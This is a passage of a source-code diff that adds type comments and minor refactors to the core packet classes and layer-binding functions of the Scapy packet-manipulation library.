a dissection is completed""" self.post_dissection(pkt) self.payload.dissection_done(pkt) def post_dissection(self, pkt): + # type: (Packet) -> None """DEV: is called after the dissection of the whole packet""" pass def get_field(self, fld): + # type: (str) -> Field[Any, Any] """DEV: returns the field instance from the name of the field""" return self.fieldtype[fld] def add_payload(self, payload): + # type: (Union[Packet, bytes]) -> None if payload is None: return elif not isinstance(self.payload, NoPayload): @@ -308,17 +357,21 @@ def add_payload(self, payload): raise TypeError("payload must be either 'Packet' or 'bytes', not [%s]" % repr(payload)) # noqa: E501 def remove_payload(self): + # type: () -> None self.payload.remove_underlayer(self) self.payload = NoPayload() self.overloaded_fields = {} def add_underlayer(self, underlayer): + # type: (Packet) -> None self.underlayer = underlayer def remove_underlayer(self, other): + # type: (Packet) -> None self.underlayer = None def copy(self): + # type: () -> Packet """Returns a deep copy of the instance.""" clone = self.__class__() clone.fields = self.copy_fields_dict(self.fields) @@ -338,6 +391,7 @@ def copy(self): return clone def _resolve_alias(self, attr): + # type: (str) -> str new_attr, version = self.deprecated_fields[attr] warnings.warn( "%s has been deprecated in favor of %s since %s !" % ( @@ -347,6 +401,7 @@ def _resolve_alias(self, attr): return new_attr def getfieldval(self, attr): + # type: (str) -> Any if self.deprecated_fields and attr in self.deprecated_fields: attr = self._resolve_alias(attr) if attr in self.fields: @@ -358,6 +413,7 @@ def getfieldval(self, attr): return self.payload.getfieldval(attr) def getfield_and_val(self, attr): + # type: (str) -> Optional[Tuple[Any, Any]] if self.deprecated_fields and attr in self.deprecated_fields: attr = self._resolve_alias(attr) if attr in self.fields: @@ -366,10 +422,12 @@ def getfield_and_val(self, attr): return self.get_field(attr), self.overloaded_fields[attr] if attr in self.default_fields: return self.get_field(attr), self.default_fields[attr] + return None def __getattr__(self, attr): + # type: (str) -> Any try: - fld, v = self.getfield_and_val(attr) + fld, v = self.getfield_and_val(attr) # type: ignore except TypeError: return self.payload.__getattr__(attr) if fld is not None: @@ -377,12 +435,13 @@ def __getattr__(self, attr): return v def setfieldval(self, attr, val): + # type: (str, Any) -> None if self.deprecated_fields and attr in self.deprecated_fields: attr = self._resolve_alias(attr) if attr in self.default_fields: fld = self.get_field(attr) if fld is None: - any2i = lambda x, y: y + any2i = lambda x, y: y # type: Callable[..., Any] else: any2i = fld.any2i self.fields[attr] = any2i(self, val) @@ -397,6 +456,7 @@ def setfieldval(self, attr, val): self.payload.setfieldval(attr, val) def __setattr__(self, attr, val): + # type: (str, Any) -> None if attr in self.__all_slots__: if attr == "sent_time": self.update_sent_time(val) @@ -408,6 +468,7 @@ def __setattr__(self, attr, val): return object.__setattr__(self, attr, val) def delfieldval(self, attr): + # type: (str) -> None if attr in self.fields: del(self.fields[attr]) self.explicit = 0 # in case a default value must be explicit @@ -422,6 +483,7 @@ def delfieldval(self, attr): self.payload.delfieldval(attr) def __delattr__(self, attr): + # type: (str) -> None if attr == "payload": return self.remove_payload() if attr in self.__all_slots__: @@ -433,6 +495,7 @@ def __delattr__(self, attr): return object.__delattr__(self, attr) def _superdir(self): + # type: () -> Set[str] """ Return a list of slots and methods, including those from subclasses. """ @@ -446,12 +509,14 @@ def _superdir(self): return attrs def __dir__(self): + # type: () -> List[str] """ Add fields to tab completion list. """ return sorted(itertools.chain(self._superdir(), self.default_fields)) def __repr__(self): + # type: () -> str s = "" ct = conf.color_theme for f in self.fields_desc: @@ -488,60 +553,72 @@ def __repr__(self): if six.PY2: def __str__(self): + # type: () -> str return self.build() else: def __str__(self): + # type: () -> str warning("Calling str(pkt) on Python 3 makes no sense!") return str(self.build()) def __bytes__(self): + # type: () -> bytes return self.build() def __div__(self, other): + # type: (Any) -> Packet if isinstance(other, Packet): cloneA = self.copy() cloneB = other.copy() cloneA.add_payload(cloneB) return cloneA elif isinstance(other, (bytes, str)): - return self / conf.raw_layer(load=other) + return self / conf.raw_layer(load=other) # type: ignore else: - return other.__rdiv__(self) + return other.__rdiv__(self) # type: ignore __truediv__ = __div__ def __rdiv__(self, other): + # type: (Any) -> Packet if isinstance(other, (bytes, str)): - return conf.raw_layer(load=other) / self + return conf.raw_layer(load=other) / self # type: ignore else: raise TypeError __rtruediv__ = __rdiv__ def __mul__(self, other): + # type: (Any) -> List[Packet] if isinstance(other, int): return [self] * other else: raise TypeError def __rmul__(self, other): + # type: (Any) -> List[Packet] return self.__mul__(other) def __nonzero__(self): + # type: () -> bool return True __bool__ = __nonzero__ def __len__(self): + # type: () -> int return len(self.__bytes__()) def copy_field_value(self, fieldname, value): + # type: (str, Any) -> Any return self.get_field(fieldname).do_copy(value) def copy_fields_dict(self, fields): + # type: (_T) -> _T if fields is None: return None return {fname: self.copy_field_value(fname, fval) for fname, fval in six.iteritems(fields)} def clear_cache(self): + # type: () -> None """Clear the raw packet cache for the field and all its subfields""" self.raw_packet_cache = None for fld, fval in six.iteritems(self.fields): @@ -555,6 +632,7 @@ def clear_cache(self): self.payload.clear_cache() def self_build(self, field_pos_list=None): + # type: (Optional[Any])-> bytes """ Create the default layer regarding fields_desc dict @@ -576,12 +654,13 @@ def self_build(self, field_pos_list=None): sval = raw(val) p += sval if field_pos_list is not None: - field_pos_list.append((f.name, sval.encode("string_escape"), len(p), len(sval))) # noqa: E501 + field_pos_list.append((f.name, sval, len(p), len(sval))) else: p = f.addfield(self, p, val) return p def do_build_payload(self): + # type: () -> bytes """ Create the default version of the payload layer @@ -590,6 +669,7 @@ def do_build_payload(self): return self.payload.do_build() def do_build(self): + # type: () -> bytes """ Create the default version of the layer @@ -607,9 +687,11 @@ def do_build(self): return pkt + pay def build_padding(self): + # type: () -> bytes return self.payload.build_padding() def build(self): + # type: () -> bytes """ Create the current layer @@ -621,6 +703,7 @@ def build(self): return p def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes """ DEV: called right after the current layer is build. @@ -631,9 +714,11 @@ def post_build(self, pkt, pay): return pkt + pay def build_done(self, p): + # type: (bytes) -> bytes return self.payload.build_done(p) def do_build_ps(self): + # type: () -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Any, Any, bytes]]]]] # noqa: E501 p = b"" pl = [] q = b"" @@ -655,6 +740,7 @@ def do_build_ps(self): return p, lst def build_ps(self, internal=0): + # type: (int) -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Any, Any, bytes]]]]] # noqa: E501 p, lst = self.do_build_ps() # if not internal: # pkt = self @@ -666,6 +752,7 @@ def build_ps(self, internal=0): return p, lst def canvas_dump(self, layer_shift=0, rebuild=1): + # type: (int, int) -> pyx.canvas.canvas if PYX == 0: raise ImportError("PyX and its dependencies must be installed") canvas = pyx.canvas.canvas() @@ -673,10 +760,10 @@ def canvas_dump(self, layer_shift=0, rebuild=1): _, t = self.__class__(raw(self)).build_ps() else: _, t = self.build_ps() - YTXT = len(t) + YTXTI = len(t) for _, l in t: - YTXT += len(l) - YTXT = float(YTXT) + YTXTI += len(l) + YTXT = float(YTXTI) YDUMP = YTXT XSTART = 1 @@ -691,15 +778,27 @@ def canvas_dump(self, layer_shift=0, rebuild=1): # backcolor=makecol(0.376, 0.729, 0.525, 1.0) def hexstr(x): + # type: (bytes) -> str return " ".join("%02x" % orb(c) for c in x) def make_dump_txt(x, y, txt): - return pyx.text.text(XDSTART + x * XMUL, (YDUMP - y) * YMUL, r"\tt{%s}" % hexstr(txt), [pyx.text.size.Large]) # noqa: E501 + # type: (int, float, bytes) -> pyx.text.text + return pyx.text.text( + XDSTART + x * XMUL, + (YDUMP - y) * YMUL, + r"\tt{%s}" % hexstr(txt), + [pyx.text.size.Large] + ) def make_box(o): - return pyx.box.rect(o.left(), o.bottom(), o.width(), o.height(), relcenter=(0.5, 0.5)) # noqa: E501 + # type: (pyx.bbox.bbox) -> pyx.bbox.bbox + return pyx.box.rect( + o.left(), o.bottom(), o.width(), o.height(), + relcenter=(0.5, 0.5) + ) def make_frame(lst): + # type: (List[Any]) -> pyx.path.path if len(lst) == 1: b = lst[0].bbox() b.enlarge(pyx.unit.u_pt) @@ -736,7 +835,14 @@ def make_frame(lst): pyx.path.lineto(fb.left(), gb.top()), pyx.path.closepath(),) - def make_dump(s, shift=0, y=0, col=None, bkcol=None, large=16): + def make_dump(s, # type: bytes + shift=0, # type: int + y=0., # type: float + col=None, # type: pyx.color.color + bkcol=None, # type: pyx.color.color + large=16 # type: int + ): + # type: (...) -> Tuple[pyx.canvas.canvas, pyx.bbox.bbox, int, float] # noqa: E501 c = pyx.canvas.canvas() tlist = [] while s: @@ -814,6 +920,7 @@ def make_dump(s, shift=0, y=0, col=None, bkcol=None, large=16): return canvas def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, None] """ DEV: to be overloaded to extract current layer's padding. @@ -823,14 +930,17 @@ def extract_padding(self, s): return s, None def post_dissect(self, s): + # type: (bytes) -> bytes """DEV: is called right after the current layer has been dissected""" return s def pre_dissect(self, s): + # type: (bytes) -> bytes """DEV: is called right before the current layer is dissected""" return s def do_dissect(self, s): + # type: (bytes) -> bytes _raw = s self.raw_packet_cache_fields = {} for f in self.fields_desc: @@ -847,6 +957,7 @@ def do_dissect(self, s): return s def do_dissect_payload(self, s): + # type: (bytes) -> None """ Perform the dissection of the layer's payload @@ -870,6 +981,7 @@ def do_dissect_payload(self, s): self.add_payload(p) def dissect(self, s): + # type: (bytes) -> None s = self.pre_dissect(s) s = self.do_dissect(s) @@ -882,6 +994,7 @@ def dissect(self, s): self.add_payload(conf.padding_layer(pad)) def guess_payload_class(self, payload): + # type: (bytes) -> Packet_metaclass """ DEV: Guesses the next payload class from layer bonds. Can be overloaded to use a different mechanism. @@ -900,6 +1013,7 @@ def guess_payload_class(self, payload): return self.default_payload_class(payload) def default_payload_class(self, payload): + # type: (bytes) -> Packet_metaclass """ DEV: Returns the default payload class if nothing has been found by the guess_payload_class() method. @@ -910,6 +1024,7 @@ def default_payload_class(self, payload): return conf.raw_layer def hide_defaults(self): + # type: () -> None """Removes fields' values that are the same as default values.""" # use list(): self.fields is modified in the loop for k, v in list(six.iteritems(self.fields)): @@ -920,10 +1035,12 @@ def hide_defaults(self): self.payload.hide_defaults() def update_sent_time(self, time): + # type: (Optional[float]) -> None """Use by clone_with to share the sent_time value""" pass def clone_with(self, payload=None, share_time=False, **kargs): + # type: (Optional[Any], bool, **Any) -> Any pkt = self.__class__() pkt.explicit = 1 pkt.fields = kargs @@ -942,14 +1059,17 @@ def clone_with(self, payload=None, share_time=False, **kargs): if share_time: # This binds the subpacket .sent_time to this layer def _up_time(x, parent=self): + # type: (float, Packet) -> None parent.sent_time = x - pkt.update_sent_time = _up_time + pkt.update_sent_time = _up_time # type: ignore return pkt def __iter__(self): + # type: () -> Iterator[Packet] """Iterates through all sub-packets generated by this Packet.""" # We use __iterlen__ as low as possible, to lower processing time def loop(todo, done, self=self): + # type: (List[str], Dict[str, Any], Any) -> Iterator[Packet] if todo: eltname = todo.pop() elt = self.getfieldval(eltname) @@ -993,6 +1113,7 @@ def loop(todo, done, self=self): return loop(todo, done) def __iterlen__(self): + # type: () -> int """Predict the total length of the iterator""" fields = [key for (key, val) in itertools.chain(six.iteritems(self.default_fields), # noqa: E501 six.iteritems(self.overloaded_fields)) @@ -1000,12 +1121,13 @@ def __iterlen__(self): length = 1 def is_valid_gen_tuple(x): + # type: (Any) -> bool if not isinstance(x, tuple): return False return len(x) == 2 and all(isinstance(z, int) for z in x) for field in fields: - fld, val = self.getfield_and_val(field) + fld, val = self.getfield_and_val(field) # type: ignore if hasattr(val, "__iterlen__"): length *= val.__iterlen__() elif is_valid_gen_tuple(val): @@ -1027,6 +1149,7 @@ def is_valid_gen_tuple(x): return length def iterpayloads(self): + # type: () -> Iterator[Packet] """Used to iter through the payloads of a Packet. Useful for DNS or 802.11 for instance. """ @@ -1037,6 +1160,7 @@ def iterpayloads(self): yield current def __gt__(self, other): + # type: (Packet) -> int """True if other is an answer from self (self ==> other).""" if isinstance(other, Packet): return other < self @@ -1046,6 +1170,7 @@ def __gt__(self, other): raise TypeError((self, other)) def __lt__(self, other): + # type: (Packet) -> int """True if self is an answer from other (other ==> self).""" if isinstance(other, Packet): return self.answers(other) @@ -1055,6 +1180,7 @@ def __lt__(self, other): raise TypeError((self, other)) def __eq__(self, other): + # type: (Any) -> bool if not isinstance(other, self.__class__): return False for f in self.fields_desc: @@ -1065,31 +1191,38 @@ def __eq__(self, other): return self.payload == other.payload def __ne__(self, other): + # type: (Any) -> bool return not self.__eq__(other) - __hash__ = None + # Note: setting __hash__ to None is the standard way + # of making an object un-hashable. mypy doesn't know that + __hash__ = None # type: ignore def hashret(self): + # type: () -> bytes """DEV: returns a string that has the same value for a request and its answer.""" return self.payload.hashret() def answers(self, other): + # type: (Packet) -> int """DEV: true if self is an answer from other""" if other.__class__ == self.__class__: return self.payload.answers(other.payload) return 0 def layers(self): + # type: () -> List[Packet_metaclass] """returns a list of layer classes (including subclasses) in this packet""" # noqa: E501 layers = [] - lyr = self + lyr = self # type: Optional[Packet] while lyr: layers.append(lyr.__class__) lyr = lyr.payload.getlayer(0, _subclass=True) return layers def haslayer(self, cls, _subclass=None): + # type: (Union[Packet_metaclass, str], Optional[bool]) -> int """ true if self has a layer that is an instance of cls. Superseded by "cls in self" syntax. @@ -1116,7 +1249,14 @@ def haslayer(self, cls, _subclass=None): return ret return self.payload.haslayer(cls, _subclass=_subclass) - def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): + def getlayer(self, + cls, # type: Union[int, Packet_metaclass] + nb=1, # type: int + _track=None, # type: Optional[List[int]] + _subclass=None, # type: Optional[bool] + **flt # type: Any + ): + # type: (...) -> Optional[Packet] """Return the nb^th layer that is an instance of cls, matching flt values. """ @@ -1129,6 +1269,8 @@ def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): if isinstance(cls, int): nb = cls + 1 cls = None + ccls = None # type: Union[None, str] + fld = None # type: Union[None, str] if isinstance(cls, str) and "." in cls: ccls, fld = cls.split(".", 1) else: @@ -1141,7 +1283,7 @@ def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): if fld is None: return self else: - return self.getfieldval(fld) + return self.getfieldval(fld) # type: ignore else: nb -= 1 for f in self.packetfields: @@ -1152,7 +1294,7 @@ def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): fvalue_gen = SetGen(fvalue_gen, _iterpacket=0) for fvalue in fvalue_gen: if isinstance(fvalue, Packet): - track = [] + track = [] # type: List[int] ret = fvalue.getlayer(cls, nb=nb, _track=track, _subclass=_subclass, **flt) if ret is not None: @@ -1162,12 +1304,14 @@ def getlayer(self, cls, nb=1, _track=None, _subclass=None, **flt): _subclass=_subclass, **flt) def firstlayer(self): + # type: () -> Packet q = self while q.underlayer is not None: q = q.underlayer return q def __getitem__(self, cls): + # type: (Packet_metaclass) -> Any if isinstance(cls, slice): lname = cls.start if cls.stop: @@ -1186,26 +1330,42 @@ def __getitem__(self, cls): return ret def __delitem__(self, cls): + # type: (Packet_metaclass) -> None del(self[cls].underlayer.payload) def __setitem__(self, cls, val): + # type: (Packet_metaclass, Packet) -> None self[cls].underlayer.payload = val def __contains__(self, cls): - """"cls in self" returns true if self has a layer which is an instance of cls.""" # noqa: E501 + # type: (Packet_metaclass) -> int + """ + "cls in self" returns true if self has a layer which is an + instance of cls. + """ return self.haslayer(cls) def route(self): + # type: () -> Tuple[Any, Optional[str], Optional[str]] return self.payload.route() def fragment(self, *args, **kargs): + # type: (*Any, **Any) -> List[Packet] return self.payload.fragment(*args, **kargs) def display(self, *args, **kargs): # Deprecated. Use show() + # type: (*Any, **Any) -> None """Deprecated. Use show() method.""" self.show(*args, **kargs) - def _show_or_dump(self, dump=False, indent=3, lvl="", label_lvl="", first_call=True): # noqa: E501 + def _show_or_dump(self, + dump=False, # type: bool + indent=3, # type: int + lvl="", # type: str + label_lvl="", # type: str + first_call=True # type: bool + ): + # type: (...) -> Optional[str] """ Internal method that shows or dumps a hierarchical view of a packet. Called by show. @@ -1254,14 +1414,22 @@ def _show_or_dump(self, dump=False, indent=3, lvl="", label_lvl="", first_call=T 4)) s += "%s%s\n" % (begn, vcol(reprval)) if self.payload: - s += self.payload._show_or_dump(dump=dump, indent=indent, lvl=lvl + (" " * indent * self.show_indent), label_lvl=label_lvl, first_call=False) # noqa: E501 + s += self.payload._show_or_dump( # type: ignore + dump=dump, + indent=indent, + lvl=lvl + (" " * indent * self.show_indent), + label_lvl=label_lvl, + first_call=False + ) if first_call and not dump: print(s) + return None else: return s def show(self, dump=False, indent=3, lvl="", label_lvl=""): + # type: (bool, int, str, str) -> Optional[Any] """ Prints or returns (when "dump" is true) a hierarchical view of the packet. @@ -1275,6 +1443,7 @@ def show(self, dump=False, indent=3, lvl="", label_lvl=""): return self._show_or_dump(dump, indent, lvl, label_lvl) def show2(self, dump=False, indent=3, lvl="", label_lvl=""): + # type: (bool, int, str, str) -> Optional[Any] """ Prints or returns (when "dump" is true) a hierarchical view of an assembled version of the packet, so that automatic fields are @@ -1289,6 +1458,7 @@ def show2(self, dump=False, indent=3, lvl="", label_lvl=""): return self.__class__(raw(self)).show(dump, indent, lvl, label_lvl) def sprintf(self, fmt, relax=1): + # type: (str, int) -> str """ sprintf(format, [relax=1]) -> str @@ -1373,8 +1543,8 @@ def sprintf(self, fmt, relax=1): fld = clsfld num = 1 if ":" in cls: - cls, num = cls.split(":") - num = int(num) + cls, snum = cls.split(":") + num = int(snum) fmt = fmt[i + 1:] except Exception: raise Scapy_Exception("Bad format string [%%%s%s]" % (fmt[:25], fmt[25:] and "...")) # noqa: E501 @@ -1403,6 +1573,7 @@ def sprintf(self, fmt, relax=1): return s def mysummary(self): + # type: () -> str """DEV: can be overloaded to return a string that summarizes the layer. Only one mysummary() is used in a whole packet summary: the one of the upper layer, # noqa: E501 except if a mysummary() also returns (as a couple) a list of layers whose # noqa: E501 @@ -1410,6 +1581,7 @@ def mysummary(self): return "" def _do_summary(self): + # type: () -> Tuple[int, str, List[Any]] found, s, needed = self.payload._do_summary() ret = "" if not found or self.__class__ in needed: @@ -1434,14 +1606,17 @@ def _do_summary(self): return found, ret, needed def summary(self, intern=0): + # type: (int) -> str """Prints a one line summary of a packet.""" return self._do_summary()[1] def lastlayer(self, layer=None): + # type: (Optional[Packet]) -> Packet """Returns the uppest layer of the packet""" return self.payload.lastlayer(self) def decode_payload_as(self, cls): + # type: (Packet_metaclass) -> None """Reassembles the payload and decode it using another packet class""" s = raw(self.payload) self.payload = cls(s, _internal=1, _underlayer=self) @@ -1451,6 +1626,7 @@ def decode_payload_as(self, cls): self.payload.dissection_done(pp) def command(self): + # type: () -> str """ Returns a string representing the command you have to type to obtain the same packet @@ -1476,6 +1652,7 @@ def command(self): return c def convert_to(self, other_cls, **kwargs): + # type: (Packet_metaclass, **Any) -> Packet """Converts this Packet to another type. This is not guaranteed to be a lossless process. @@ -1495,13 +1672,14 @@ def convert_to(self, other_cls, **kwargs): return Raw(raw(self)) if "_internal" not in kwargs: - return other_cls.convert_packet(self, _internal=True, **kwargs) + return other_cls.convert_packet(self, _internal=True, **kwargs) # type: ignore # noqa: E501 raise TypeError("Cannot convert {} to {}".format( type(self).__name__, other_cls.__name__)) @classmethod def convert_packet(cls, pkt, **kwargs): + # type: (Packet, **Any) -> Packet """Converts another packet to be this type. This is not guaranteed to be a lossless process. @@ -1522,7 +1700,11 @@ def convert_packet(cls, pkt, **kwargs): type(pkt).__name__, cls.__name__)) @classmethod - def convert_packets(cls, pkts, **kwargs): + def convert_packets(cls, + pkts, # type: List[Packet] + **kwargs # type: Any + ): + # type: (...) -> Iterator[Iterator[Packet]] """Converts many packets to this type. This is implemented as a generator. @@ -1535,126 +1717,169 @@ def convert_packets(cls, pkts, **kwargs): class NoPayload(Packet): def __new__(cls, *args, **kargs): + # type: (Packet_metaclass, *Any, **Any) -> Packet singl = cls.__dict__.get("__singl__") if singl is None: cls.__singl__ = singl = Packet.__new__(cls) Packet.__init__(singl) - return singl + return singl # type: ignore def __init__(self, *args, **kargs): + # type: (*Any, **Any) -> None pass def dissection_done(self, pkt): - return + # type: (Packet) -> None + pass def add_payload(self, payload): + # type: (Union[Packet, bytes]) -> NoReturn raise Scapy_Exception("Can't add payload to NoPayload instance") def remove_payload(self): + # type: () -> None pass def add_underlayer(self, underlayer): + # type: (Any) -> None pass def remove_underlayer(self, other): + # type: (Packet) -> None pass def copy(self): + # type: () -> NoPayload return self def clear_cache(self): + # type: () -> None pass def __repr__(self): + # type: () -> str return "" def __str__(self): + # type: () -> str return "" def __bytes__(self): + # type: () -> bytes return b"" def __nonzero__(self): + # type: () -> bool return False __bool__ = __nonzero__ def do_build(self): + # type: () -> bytes return b"" def build(self): + # type: () -> bytes return b"" def build_padding(self): + # type: () -> bytes return b"" def build_done(self, p): + # type: (bytes) -> bytes return p def build_ps(self, internal=0): + # type: (int) -> Tuple[bytes, List[Any]] return b"", [] def getfieldval(self, attr): + # type: (str) -> NoReturn raise AttributeError(attr) def getfield_and_val(self, attr): + # type: (str) -> NoReturn raise AttributeError(attr) def setfieldval(self, attr, val): + # type: (str, Any) -> NoReturn raise AttributeError(attr) def delfieldval(self, attr): + # type: (str) -> NoReturn raise AttributeError(attr) def hide_defaults(self): + # type: () -> None pass def __iter__(self): + # type: () -> Iterator[Packet] return iter([]) def __eq__(self, other): + # type: (Any) -> bool if isinstance(other, NoPayload): return True return False def hashret(self): + # type: () -> bytes return b"" def answers(self, other): + # type: (NoPayload) -> bool return isinstance(other, NoPayload) or isinstance(other, conf.padding_layer) # noqa: E501 def haslayer(self, cls, _subclass=None): + # type: (Union[Packet_metaclass, str], Optional[bool]) -> int return 0 - def getlayer(self, cls, nb=1, _track=None, **flt): + def getlayer(self, + cls, # type: Union[int, Packet_metaclass] + nb=1, # type: int + _track=None, # type: Optional[List[int]] + _subclass=None, # type: Optional[bool] + **flt # type: Any + ): + # type: (...) -> Optional[Packet] if _track is not None: _track.append(nb) return None def fragment(self, *args, **kargs): + # type: (*Any, **Any) -> List[Packet] raise Scapy_Exception("cannot fragment this packet") - def show(self, indent=3, lvl="", label_lvl=""): + def show(self, dump=False, indent=3, lvl="", label_lvl=""): + # type: (bool, int, str, str) -> None pass - def sprintf(self, fmt, relax): + def sprintf(self, fmt, relax=1): + # type: (str, int) -> str if relax: return "??" else: raise Scapy_Exception("Format not found [%s]" % fmt) def _do_summary(self): + # type: () -> Tuple[int, str, List[Any]] return 0, "", [] def layers(self): + # type: () -> List[Packet_metaclass] return [] - def lastlayer(self, layer): - return layer + def lastlayer(self, layer=None): + # type: (Optional[Packet]) -> Packet + return layer or self def command(self): + # type: () -> str return "" def route(self): + # type: () -> Tuple[None, None, None] return (None, None, None) @@ -1665,17 +1890,20 @@ def route(self): class Raw(Packet): name = "Raw" - fields_desc = [StrField("load", "")] + fields_desc = [StrField("load", b"")] - def __init__(self, _pkt=None, *args, **kwargs): + def __init__(self, _pkt=b"", *args, **kwargs): + # type: (bytes, *Any, **Any) -> None if _pkt and not isinstance(_pkt, bytes): _pkt = bytes_encode(_pkt) super(Raw, self).__init__(_pkt, *args, **kwargs) def answers(self, other): + # type: (Packet) -> int return 1 def mysummary(self): + # type: () -> str cs = conf.raw_summary if cs: if callable(cs): @@ -1686,18 +1914,23 @@ def mysummary(self): @classmethod def convert_packet(cls, pkt, **kwargs): + # type: (Packet, **Any) -> Raw return Raw(raw(pkt)) class Padding(Raw): name = "Padding" - def self_build(self): + def self_build(self, field_pos_list=None): + # type: (Optional[Any]) -> bytes return b"" def build_padding(self): - return (raw(self.load) if self.raw_packet_cache is None - else self.raw_packet_cache) + self.payload.build_padding() + # type: () -> bytes + return ( + bytes_encode(self.load) if self.raw_packet_cache is None + else self.raw_packet_cache + ) + self.payload.build_padding() conf.raw_layer = Raw @@ -1710,7 +1943,12 @@ def build_padding(self): ################# -def bind_bottom_up(lower, upper, __fval=None, **fval): +def bind_bottom_up(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Any] + **fval # type: Any + ): + # type: (...) -> None r"""Bind 2 layers for dissection. The upper layer will be chosen for dissection on top of the lower layer, if ALL the passed arguments are validated. If multiple calls are made with @@ -1727,7 +1965,12 @@ def bind_bottom_up(lower, upper, __fval=None, **fval): lower.payload_guess.append((fval, upper)) -def bind_top_down(lower, upper, __fval=None, **fval): +def bind_top_down(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Any] + **fval # type: Any + ): + # type: (...) -> None """Bind 2 layers for building. When the upper layer is added as a payload of the lower layer, all the arguments will be applied to them. @@ -1744,7 +1987,12 @@ def bind_top_down(lower, upper, __fval=None, **fval): @conf.commands.register -def bind_layers(lower, upper, __fval=None, **fval): +def bind_layers(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Dict[str, int]] + **fval # type: Any + ): + # type: (...) -> None """Bind 2 layers on some specific fields' values. It makes the packet being built and dissected when the arguments @@ -1763,7 +2011,12 @@ def bind_layers(lower, upper, __fval=None, **fval): bind_bottom_up(lower, upper, **fval) -def split_bottom_up(lower, upper, __fval=None, **fval): +def split_bottom_up(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Any] + **fval # type: Any + ): + # type: (...) -> None """This call un-links an association that was made using bind_bottom_up. Have a look at help(bind_bottom_up) """ @@ -1771,6 +2024,7 @@ def split_bottom_up(lower, upper, __fval=None, **fval): fval.update(__fval) def do_filter(params, cls): + # type: (Dict[str, int], Packet_metaclass) -> bool params_is_invalid = any( k not in params or params[k] != v for k, v in six.iteritems(fval) ) @@ -1778,7 +2032,12 @@ def do_filter(params, cls): lower.payload_guess = [x for x in lower.payload_guess if do_filter(*x)] -def split_top_down(lower, upper, __fval=None, **fval): +def split_top_down(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Any] + **fval # type: Any + ): + # type: (...) -> None """This call un-links an association that was made using bind_top_down. Have a look at help(bind_top_down) """ @@ -1793,7 +2052,12 @@ def split_top_down(lower, upper, __fval=None, **fval): @conf.commands.register -def split_layers(lower, upper, __fval=None, **fval): +def split_layers(lower, # type: Packet_metaclass + upper, # type: Packet_metaclass + __fval=None, # type: Optional[Any] + **fval # type: Any + ): + # type: (...) -> None """Split 2 layers previously bound. This call un-links calls bind_top_down and bind_bottom_up. It is the opposite of # noqa: E501 bind_layers. @@ -1810,6 +2074,7 @@ def split_layers(lower, upper, __fval=None, **fval): @conf.commands.register def explore(layer=None): + # type: (Optional[str]) -> None """Function used to discover the Scapy layers and protocols. It helps to see which packets exists in contrib or layer files. @@ -1844,10 +2109,9 @@ def explore(layer=None): button_dialog from prompt_toolkit.formatted_text import HTML # Check for prompt_toolkit >= 3.0.0 + call_ptk = lambda x: cast(str, x) # type: Callable[[Any], str] if _version_checker(prompt_toolkit, (3, 0)): - call_ptk = lambda x: x.run() - else: - call_ptk = lambda x: x + call_ptk = lambda x: x.run() # type: ignore # 1 - Ask for layer or contrib btn_diag = button_dialog( title=six.text_type("Scapy v%s" % conf.version), @@ -1866,17 +2130,17 @@ def explore(layer=None): # 2 - Retrieve list of Packets if action == "layers": # Get all loaded layers - values = conf.layers.layers() + lvalues = conf.layers.layers() # Restrict to layers-only (not contribs) + packet.py and asn1*.py - values = [x for x in values if ("layers" in x[0] or - "packet" in x[0] or - "asn1" in x[0])] + values = [x for x in lvalues if ("layers" in x[0] or + "packet" in x[0] or + "asn1" in x[0])] elif action == "contribs": # Get all existing contribs from scapy.main import list_contrib - values = list_contrib(ret=True) + cvalues = cast(List[Dict[str, str]], list_contrib(ret=True)) values = [(x['name'], x['description']) - for x in values] + for x in cvalues] # Remove very specific modules values = [x for x in values if "can" not in x[0]] else: @@ -1892,7 +2156,7 @@ def explore(layer=None): # _l which contains the files in the layer, and a _name # argument which is its name. The other keys are the subfolders, # which are similar dictionaries - tree = defaultdict(list) + tree = defaultdict(list) # type: Dict[str, Union[List[Any], Dict[str, Any]]] # noqa: E501 for name, desc in values: if "." in name: # Folder detected parts = name.split(".") @@ -1900,30 +2164,31 @@ def explore(layer=None): for pa in parts[:-1]: if pa not in subtree: subtree[pa] = {} - subtree = subtree[pa] # one layer deeper - subtree["_name"] = pa + # one layer deeper + subtree = subtree[pa] # type: ignore + subtree["_name"] = pa # type: ignore if "_l" not in subtree: subtree["_l"] = [] - subtree["_l"].append((parts[-1], desc)) + subtree["_l"].append((parts[-1], desc)) # type: ignore else: - tree["_l"].append((name, desc)) + tree["_l"].append((name, desc)) # type: ignore elif action == "layers": tree = {"_l": values} # 3 - Ask for the layer/contrib module to explore - current = tree - previous = [] + current = tree # type: Any + previous = [] # type: List[Dict[str, Union[List[Any], Dict[str, Any]]]] # noqa: E501 while True: # Generate tests & form folders = list(current.keys()) _radio_values = [ ("$" + name, six.text_type('[+] ' + name.capitalize())) for name in folders if not name.startswith("_") - ] + current.get("_l", []) + ] + current.get("_l", []) # type: List[str] cur_path = "" if previous: cur_path = ".".join( itertools.chain( - (x["_name"] for x in previous[1:]), + (x["_name"] for x in previous[1:]), # type: ignore (current["_name"],) ) ) @@ -2003,7 +2268,10 @@ def explore(layer=None): print(pretty_list(rtlst, [("Class", "Name")], borders=True)) -def _pkt_ls(obj, verbose=False): +def _pkt_ls(obj, # type: Union[Packet, Packet_metaclass] + verbose=False, # type: bool + ): + # type: (...) -> List[Tuple[str, Field_metaclass, str, str, List[str]]] """Internal function used to resolve `fields_desc` to display it. :param obj: a packet object or class @@ -2016,15 +2284,15 @@ def _pkt_ls(obj, verbose=False): fields = [] for f in obj.fields_desc: cur_fld = f - attrs = [] - long_attrs = [] + attrs = [] # type: List[str] + long_attrs = [] # type: List[str] while isinstance(cur_fld, (Emph, ConditionalField)): if 